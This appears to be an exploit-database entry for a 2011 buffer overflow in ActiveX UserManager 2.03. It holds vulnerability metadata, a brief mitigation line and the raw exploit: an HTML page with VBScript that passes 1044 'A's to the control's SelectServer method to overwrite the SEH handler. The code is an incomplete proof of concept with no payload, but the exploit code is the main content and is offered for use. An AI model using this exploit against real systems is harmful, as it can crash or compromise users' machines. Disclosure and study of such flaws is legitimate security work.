header-logo
Suggest Exploit
vendor:
ActiveX UserManager
by:
Blake
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ActiveX UserManager
Affected Version From: 02.03
Affected Version To: 02.03
Patch Exists: NO
Related CWE: N/A
CPE: a:brothersoft:activex_usermanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 / IE7 in VirtualBox
2011

ActiveX UserManager 2.03 Buffer Overflow

This exploit uses a buffer overflow vulnerability in ActiveX UserManager 2.03 to overwrite SEH with 00410041. The exploit is triggered by passing a string of 1044 'A's as an argument to the SelectServer method.

Mitigation:

Ensure that ActiveX UserManager 2.03 is not installed on the system.
Source

Exploit-DB raw data:

<html>
<object classid='clsid:E5D2CE27-5FA0-11D2-A666-204C4F4F5020' id='target'></object>
<script language='vbscript'>
' Exploit Title: ActiveX UserManager 2.03 Buffer Overflow
' Date: January 16, 2011
' Author: Blake
' Software Link: http://www.brothersoft.com/activex-usermanager-14519.html
' Version: 2.03
' Tested on: Windows XP SP3 / IE7 in VirtualBox
' Overwrites SEH with 00410041 but I could not find a useable pop pop ret


arg1=String(1044, "A")
arg2=True
exploit = arg1

target.SelectServer exploit ,arg2 

</script>